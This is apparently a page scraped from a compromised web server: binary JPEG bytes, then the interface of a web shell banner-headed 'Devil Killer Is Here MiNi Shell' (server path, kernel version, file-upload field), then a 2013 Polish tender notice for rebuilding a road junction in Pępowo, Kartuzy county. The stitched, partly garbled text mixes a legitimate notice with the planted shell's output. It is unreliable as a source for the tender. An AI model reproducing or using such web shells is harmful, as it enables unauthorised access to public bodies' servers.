JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130708/136257-N-2013.html

<p class="kh_header"><b>Kartuzy: Przebudowa skrzyżowania drogi powiatowej nr 1900G z drogi gminnymi ul. Lipową i ul. Armii Krajowej w miejscowości Pępowo</b><br>
<b>Numer ogłoszenia: 136257 - 2013; data zamieszczenia: 08.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Kartuzach , ul. Gdańska 26, 83-300 Kartuzy, woj. pomorskie, tel. 058 6810715, faks 058 6811522.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zdp.kartuzy.ibip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa skrzyżowania drogi powiatowej nr 1900G z drogi gminnymi ul. Lipową i ul. Armii Krajowej w miejscowości Pępowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie robót obejmuje: a) oznakowanie miejsca robót wg projektu oznakowania i organizacji robót, który należy przedłożyć do akceptacji tut. Zarządu Dróg, b) zakres robót: Lp. Nr. ST Wyszczególnienie elementów rozliczeniowych Jednostka Nazwa Ilość 1 2 3 4 5 D-01.00.00 ROBOTY PRZYGOTOWAWCZE D-01.01.01a Odtworzenie trasy i jej punktów wysokościowych oraz sporządzenie inwentaryzacji powykonawczej drogi 1 Wytyczenie trasy w terenie płaskim oraz sporządzenie inwentaryzacji powykonawczej drogi km 0,22 D-01.02.01 Usunięcie drzew i krzaków 2 Usunięcie istniejącego pnia - strona prawa km 0+111,0 szt. 1,00 D-01.02.04 Rozbiórka elementów dróg 3 Rozbiórka nawierzchni z kostki betonowej z odwozem materiału z rozbiórki na składowisko inwestora - istniejące schody terenowe - 7m2; - istniejący chodnik - 65m2; m2 72,00 4 Rozbiórka fragmentu nawierzchni istniejącego placu z kostki betonowej przed obiektem usługowym na działce nr 43/18 wraz z rozbiórką i ponownym ustawieniem krawężników betonowych na granicy pasa drogowego (pozostały materiał z rozbiórki należy złożyć na terenie działki nr 43/18) m2 30,00 5 Rozbiórka chodnika z płytek betonowych wraz z odwozem materiału z rozbiórki na składowisko inwestora m2 170,00 6 Rozbiórka nawierzchni z płyt betonowych MEBA wraz z odwozem materiału z rozbiórki na składowisko inwestora m2 16,00 7 Rozbiórka istniejącego krawężnika i obrzeża betonowego z odwozem materiału z rozbiórki na składowisko inwestora m 365,00 8 Rozbiórka istniejącego ścieku betonowego z odwozem materiału z rozbiórki na składowisko inwestora m 12,00 9 Rozbiórka istniejących monolitycznych ścian czołowych przepustów wraz z odwozem i utylizacją materiału z rozbiórki; szt. 3,00 10 Rozbiórka istniejącej wiaty przystankowej wraz z fundamentem oraz elementami betonowymi z odwozem i utylizacją; szt. 1,00 11 Demontaż i ponowne ustawienie znaków pionowych szt. 2,00 11.1 Demontaż istniejących znaków pionowych i słupków wraz z odwozem na składowisko inwestora szt. 10,00 12 Rozbiórka nawierzchni bitumicznej pod projektowaną sieć kablową i sieć kanalizacji deszczowej m2 46,00 D-02.00.00 ROBOTY ZIEMNE D-02.01.01 Wykonanie wykopów w gruntach nieskalistych 13 Mechaniczne wykonanie wykopów w gruncie kat. II z wywiezieniem urobku na odkład: - wykop pod projektowane konstrukcje (W - wg tabeli nr 2) - 166,6m3; - wykop pod projektowane sieci uzbrojenia terenu - 250,4m3; Uwaga: W rejonie uzbrojenia podziemnego roboty wykonywane ręcznie m3 417,00 D - 02.03.01 Wykonanie nasypów 14 Mechaniczne wykonanie nasypu z gruntu kat. II dowiezionego z dokopu: - nasyp pod projektowane konstrukcje (N - wg tabeli nr 2) - 123,9m2; - nasyp pod projektowane sieci uzbrojenia terenu - N=236,1m3; m3 360,00 D-04.00.00 PODBUDOWY D-04.02.02 Warstwa mrozoochronna 15 Wykonanie warstwy mrozoochronnej z pospółki o gr. 15cm: - poszerzenia istniejących dróg głównych: 35m2; - zjazdy indywidualne: 18m2; m2 53,00 D-04.03.01 Oczyszczenie i skropienie warstw konstrukcyjnych 16 Oczyszczenie i skroplenie emulsją asfaltową podbudowy z betonu cementowego lub z kruszywa łamanego w ilości 0,5kg/m2 pod warstwę wyrównawczą lub podbudowę z betonu asfaltowego: - poszerzenia istniejącej nawierzchni: 35,0m2; - miejsca całkowitej wymiany konstrukcji nawierzchni (budowa sieci: kanalizacja kablowa i kanalizacja deszczowa) - 46,0m2; m2 81,00 17 Oczyszczenie i skroplenie emulsją asfaltową podbudowy z betonu asfaltowego w ilości 0,5kg/m2 pod warstwę wyrównawczą z betonu asfaltowego: - drogi główne: 46,00m2; m2 46,00 18 Oczyszczenie i skroplenie emulsją asfaltową istniejącej i sfrezowanej nawierzchni asfaltowej w ilości 0,5kg/m2 pod warstwę wyrównawczą z betonu asfaltowego: - drogi główne: 1309,00m2; m2 1 309,00 19 Oczyszczenie i skroplenie emulsją asfaltową warstwy wyrównawczej w ilości 0,5kg/m2 pod warstwę ścieralną z SMA: - drogi główne: 1390,00m2; m2 1 390,00 D-04.04.02 Podbudowa z kruszywa łamanego stabilizowanego mechanicznie 20 Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie o gr. 10 cm: - chodniki i perony przystanków z kostki betonowej: 465,0m2; - chodniki i perony przystanków z płytek z guzkami: 29m2; m2 494,00 21 Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie o gr. 15 cm: - zjazdy indywidualne: 18,0m2; m2 18,00 22 Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie o gr. 20 cm: - miejsca całkowitej wymiany konstrukcji nawierzchni (budowa sieci: kanalizacja kablowa i kanalizacja deszczowa) - 46,0m2; m2 46,00 D-04.06.01b Podbudowa z betonu cementowego 23 Wykonanie podbudowy z betonu B-15 gr. 20cm : - poszerzenia istniejącej nawierzchni bitumicznej: 35,00; m2 35,00 D-05.00.00 NAWIERZCHNIE D-05.03.05b Nawierzchnia z betonu asfaltowego. Warstwa wiążąca i wyrównawcza wg WT-1 i WT-2 z 2010r. 24 Wyrównanie mieszanką z betonu asfaltowego AC16W grubości min. 3cm: - drogi główne: 74,50m3 - wg tab. nr 3; Mg 178,80 25 Podbudowa z betonu asfaltowego AC16W o gr. 8cm - miejsca całkowitej wymiany konstrukcji nawierzchni (budowa sieci: kanalizacja kablowa i kanalizacja deszczowa) - 46,0m2; m2 46,00 D-05.03.09 Pobocze stabilizowane z destruktu bitumicznego zamkniętego 26 Ułożenie pobocza stabilizowanego z destruktu: - sprysk emulsją asfaltową w ilości do 1,2kg/m2 (uszczelnienie) - destrukt asfaltowy (odzysk po frezowaniu) grubości 10cm - sprysk lepiszczem asfaltowym do 1,5kg/m2 - w-wa kruszyw naturalnych (min. 15cm) m2 86,00 D-05.03.11 Frezowanie nawierzchni bitumicznych na zimno 27 Frezowanie nawierzchni bitumicznych grubości od 2cm do 5cm z odwozem do 1km celem składowania i przygotowania do ponownego wbudowania w pobocze stabilizowane: - 29,4m3 - wg tab. nr 3 (istniejąca nawierzchnia jezdni) - 840m2 m2 840,00 D-05.03.13 Nawierzchnia z mieszanki mastyksowo - grysowej (SMA) wg WT-1 i WT-2 z 2010r - warstwa ścieralna 28 Wykonanie warstwy ścieralnej z SMA11 grubości 4cm (drogi główne) m2 1 390,00 D-05.03.23 Nawierzchnia z kostki brukowej betonowej oraz z płytek betonowych 29 Wykonanie warstwy ścieralnej z kostki betonowej wibroprasowanej koloru szarego gr. 6cm na podsypce cementowo - piaskowej 1:4 gr. 5cm - chodniki oraz perony przystanków: 465,0m2; m2 465,00 30 Wykonanie warstwy ścieralnej z płytek betonowych z guzkami koloru żółtego o wymiarach 35x35x5cm na podsypce cem.-piask 1:4 gr. 6cm m2 29,00 31 Wykonanie warstwy ścieralnej z kostki betonowej wibroprasowanej koloru czerwonego gr 8cm na podsypce cementowo - piaskowej 1:4 gr. 3cm - zjazdy indywidualne: 18,0m2; m2 18,00 D-05.03.26i Poszerzenie istniejącej nawierzchni asfaltowej z zastosowaniem geokompozytu 32 Wzmocnienie nawierzchni bitumicznej siatką przeciwspękaniową na podkładzie z włókniny o wytrzymałości na rozciąganie min. 70kN/m: - połączenie istniejącej konstrukcji nawierzchni z konstrukcją na poszerzeniach - 200,0m2; - miejsca całkowitej wymiany konstrukcji nawierzchni (budowa sieci: kanalizacja kablowa i kanalizacja deszczowa) - 92,0m2; m2 292,00 D-06.00.00 ROBOTY WYKOŃCZENIOWE D-06.01.01 Umocnienie powierzchniowe skarp, rowów i ścieków 30 Ułożenie humusu grubości min. 10cm wraz z obsianiem skarp mieszankami traw: - wg tab. nr 1 Hn=61,4m3; m2 614,00 31 Wyprofilowanie i oczyszczenie istniejącego rowu odwadniającego z pozostałości organicznych - powierzchnia do wyprofilowania, splantowania, obrobienia na czysto i obsiania mieszankami traw z odwiezieniem resztek organicznych - rów o długości ok. 60m m2 270,00 32 Umocnienie skarpy rowu płytami betonowymi ażurowymi typu Meba 40x60cm grubości 10cm na podsypce żwirowej gr. 5cm m2 33,00 33 Wybrukowanie wylotów i ścian czołowych przepustów oraz wylotów przykanalików brukiem nieobrobionym 13x16cm na ławie betonowej B-15 gr. 10cm spoinowanym zaprawą cementową; m2 17,00 D-06.02.01 Przepusty betonowe 34 Przedłużenie istniejącego przepustu betonowego oraz wylotu kanalizacji deszczowej rurami betonowymi kielichowymi fi400 wraz z izolacją zgodnie z rys. 4.2; mb 8,00 35 Oczyszczenie i odmulenie istniejących przepustów pod zjazdami szt. 2,00 D-07.00.00 URZĄDZENIA BEZPIECZEŃSTWA RUCHU D-07.01.01 Oznakowanie poziome 36 Malowanie metodą grubowarstwową (białe) - masa chemoutwardzalna - znak P-10 o dł. 26,9m - 52,00m2; - znak P-12 o dł. 18,8m - 9,37m2; - znak P-14 o dł. 12,1m - 4,55m2; - znak P-17 o dł. 60,0m - 9,12m2; - znak P-1e o dł. 38,6m - 4,63m2; - znak P-4 o dł. 131,4m - 31,53m2; m2 111 D-07.02.01 Oznakowanie pionowe 37 Ustawienie słupków stalowych ocynkowanych fi 60mm ustawionych na ławie betonowej B-10 szt. 15 38 Ustawienie słupków stalowych ocynkowanych fi 60mm (długie na dwa znaki) ustawionych na ławie betonowej B-10 szt. 2 39 Ustawienie wsporników stalowych ocynkowanych fi 60mm na ławie betonowej B-10 szt. 2 40 Znaki typu A - małe pokryte folią typ II szt. 4 41 Znaki typu A - średnie pokryte folią typ II szt. 2 42 Znaki typu D - małe pokryte folią typ II szt. 6 43 Znaki typu D - średnie pokryte folią typ II szt. 7 44 Znaki typu E - średnie pokryte folią typ II szt. 2 45 Tabliczki T - małe pokryte folią typ II szt. 2 46 Ustawienie słupków blokujących U-12c o wysokości 0,8m szt. 6 D-07.06.02 Urządzenia zabezpieczające ruch pieszych i rowerzystów 47 Balustrada szczeblinkowa z rur stalowych o wysokości 1,1m na fundamencie z betonu B-20 (0,07 m3/mb bariery - 10*0,07=0,70m3) m 40 D-08.00.00 ELEMENTY ULIC D-08.01.01 Krawężniki i oporniki betonowe: 48 Ustawienie krawężników betonowych 15x30cm na ławie betonowej B-15 z oporem o przekroju 0,075m2 m 293,00 łuk 0 < R <=10: 29m; łuk 10 < R <=40: 39m; na prostej: 225m; 49 Ustawienie oporników betonowych 12x25cm na ławie betonowej B-15 z oporem o przekroju 0,075m2 m 90,00 łuk 0 < R <=10: 0m; łuk 10 < R <=40: 0m; na prostej: 90m; D-08.03.01 Betonowe obrzeża chodnikowe 50 Obrzeże betonowe 8x30cm koloru szarego na podsypce cem.-piask. 1:4 gr.5cm m 405,00 łuk 0 < R <=10: 11m; łuk 10 < R <=20: 20m; na prostej: 374m; D-08.05.01 Ściek z prefabrykowanych elementów betonowych 51 Ułożenie betonowego ścieku korytkowego 60x50x15cm (wg KPED 01.03) na ławie betonowej B-15 z oporem o przekroju 0,115m2 m 12,00 D-10.00.00 INNE ROBOTY DROGOWE D-10.01.01 Regulacja wysokościowa istniejących studni i wpustów deszczowych oraz przełożenie istniejących nawierzchni z kostki i płyt betonowych 52 Regulacja wysokościowa: - studni kanalizacyjnych szt. 2 - zasuw wodociągowych szt. 4 - studni i skrzynek telekomunikacyjnych szt. 3 - wpustów deszczowych szt. 1 szt. 10,00 53 Regulacja wysokościowa i w planie nawierzchni z kostki betonowej: - zjazd na do obiektu usługowego - strona lewa - 23m2; - dwa zjazdy na posesję - strona prawa - 38m2; m2 61,00 54 Regulacja w planie nawierzchni chodnika z płytek betonowych wraz z obrzeżem betonowym po usunięciu pnia i karpiny - strona prawa km 0+111,0 m2 17,00 D-10.01.02 Schody terenowe 55 Wykonanie stopnia schodów terenowych o długości 1,5m, szerokości 0,35m i wysokości 0,14m z kostki betonowej wibroprasowanej gr. 6cm na ławie betonowej z betonu B-15 gr 17cm oraz obrzeża betonowego 6x30cm na ławie betonowej z betonu B-15 gr. 10cm (Zgodnie z rysunkiem przekrojów konstrukcyjnych) szt. 6,00 56 Wykonanie stopnia schodów terenowych o długości 2,0m, szerokości 0,35m i wysokości 0,14m z kostki betonowej wibroprasowanej gr. 6cm na ławie betonowej z betonu B-15 gr 17cm oraz obrzeża betonowego 6x30cm na ławie betonowej z betonu B-15 gr. 10cm (Zgodnie z rysunkiem przekrojów konstrukcyjnych) szt. 3,00 D-10.01.03 Wiata przystankowa 57 Ustawienie wiaty przystankowej o wymiarach min. 1,25m x 3,5m szt. 2,00 D-10.01.04 Usunięcie kolizji z istniejącymi sieciami uzbrojenia terenu 58 Przestawienie kolidującgo słupa oświetleniowego szt. 1,00 D-10.01.05 Wpust deszczowy ze studnią i przykanalikiem oraz studnia kanalizacji deszczowej z rurociągiem 59 Ustawienie wpustu deszczowego na studzience ściekowej betonowej C35/45 z osadnikiem (zgodnie z rys.D12) wraz z jego obrukowaniem szt. 1,00 60 Ustawienie studzienki ściekowej betonowej C35/45 z osadnikiem o głębokości min. 0,5m wraz z jej zaślepieniem monolityczną płytą żelbetową (zgodnie z rys. nr D9) szt. 2,00 61 Wykonanie przykanalika - kanał z rur PVC-U SN8 łączonych na wcisk o śr. zewn. 200mm m 25,00 62 Kanał z rur PVC-U SN8 lite łączonych na wcisk o śr. zewn. 250mm m 14,50 63 Ustawienie studni rewizyjnej (osadnikowej) z kręgów betonowych C35/45 o średnicy fi1200 z dnem monolitycznym o głębokości 3m. Studnia zwieńczone włazem kanałowym żeliwnym ryglowanym z betonowym wypełnieniem pokrywy, klasy D400. (zgodnie z rys.D10) szt. 1,00 D-07.03.01 Sygnalizacja świetlna ruchu ulicznego 64 Budowa kanalizacji kablowej 2-otworowej m 96 65 Budowa kanalizacji kablowej 1-otworowej m 126 66 Budowa studni kablowych SKR-1 szt 8 67 Budowa studni kablowych SK-1 szt 6 68 Montaż masztów sygnalizayjnych niskich MN kpl 8 69 Montaż masztów sygnalizayjnych wysokich MW kpl 1 70 Wciąganie kabli sygnalizacyjnych do kanalizacji i masztów m 461 71 Budowa lini kablowej nn.-zasilanie sterownika m 54 72 Montaż pętli indukcyjnych kpl 10 73 Montaż sygnalizatorów LED, 3x300mm kpl 6 74 Montaż ekranów kontrastowych kpl 2 75 Montaż sygnalizatorów LED, 2x200mm kpl 8 76 Montaż sygnalizatorów LED, 1x200mm kpl 4 77 Montaż sygnalizatorów akustycznych kpl 8 78 Montaż przycisków dla pieszych kpl 4 79 Montaż sterownika kpl 1 80 Pomiary i czynności sprawdzające kpl 1 c) uporządkowanie terenu.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego na podstawie art. 67 ust.1 pkt 6 ustawy PZP w ilości do 50% przedmiotowego zamówienia w zakresie robót określonych w pkt. II.1.4)</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.23.31.20-6, 45.23.32.20-7, 34.92.21.00-7, 45.23.32.94-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do zamówienia należy wnieść wadium w kwocie 8000,00zł (słownie: osiem tysięcy złotych 00/100) przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub kilku następujących formach: a) pieniądzu wpłacone przelewem na rachunek bankowy zamawiającego nr 59 1020 1866 0000 1102 0002 6989; b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; c) gwarancjach bankowych; d) gwarancjach ubezpieczeniowych; e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.). Wadium należy wnieść przed upływem terminu składania ofert, lecz nie później niż do dnia 23.07.2013r. do godz. 10:45.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki dotyczące: posiadania uprawnień do dokonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń i dokumentów złożonych przez wykonawców. Ocena dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie wyniku badań treści żądanych oświadczeń i dokumentów. Wykonawcy, którzy nie wykażą spełnienia warunku udziału w postępowaniu zostaną wykluczeni z postępowania, a ich oferta zostanie odrzucona.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki dotyczące: posiadania wiedzy i doświadczenia; tzn. zrealizował jako główny wykonawca w okresie ostatnich 5 lat, co najmniej jedno zadanie o charakterze i złożoności porównywalnej z zakresem zamówienia. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń i dokumentów złożonych przez wykonawców. Ocena dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie wyniku badań treści żądanych oświadczeń i dokumentów. Wykonawcy, którzy nie wykażą spełnienia warunku udziału w postępowaniu zostaną wykluczeni z postępowania, a ich oferta zostanie odrzucona</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki dotyczące: dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonywania zamówienia; Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń i dokumentów złożonych przez wykonawców. Ocena dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie wyniku badań treści żądanych oświadczeń i dokumentów. Wykonawcy, którzy nie wykażą spełnienia warunku udziału w postępowaniu zostaną wykluczeni z postępowania, a ich oferta zostanie odrzucona.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki dotyczące: Dysponowania odpowiednim potencjałem kadrowym tzn. mieć do dyspozycji odpowiednio wykwalifikowany personel, zdolny do wykonania przedmiotu zamówienia, w tym posiadający wymagane uprawnienia do wykonywania w/w robót. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń i dokumentów złożonych przez wykonawców. Ocena dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie wyniku badań treści żądanych oświadczeń i dokumentów. Wykonawcy, którzy nie wykażą spełnienia warunku udziału w postępowaniu zostaną wykluczeni z postępowania, a ich oferta zostanie odrzucona</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy spełniają warunki dotyczące: posiadania sytuacji ekonomicznej i finansowej; zakłada się, że spełnią warunek udziału w postępowaniu wykonawcy, którzy mają dostęp lub dysponować środkami finansowymi wystarczającymi do realizacji robót przez okres 1 miesiąca, oszacowanymi na sumę 200000,00zł bez uwzględnienia zobowiązań z tytułu realizacji innych zamówień. Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie oświadczeń i dokumentów złożonych przez wykonawców. Ocena dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie wyniku badań treści żądanych oświadczeń i dokumentów. Wykonawcy, którzy nie wykażą spełnienia warunku udziału w postępowaniu zostaną wykluczeni z postępowania, a ich oferta zostanie odrzucona.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

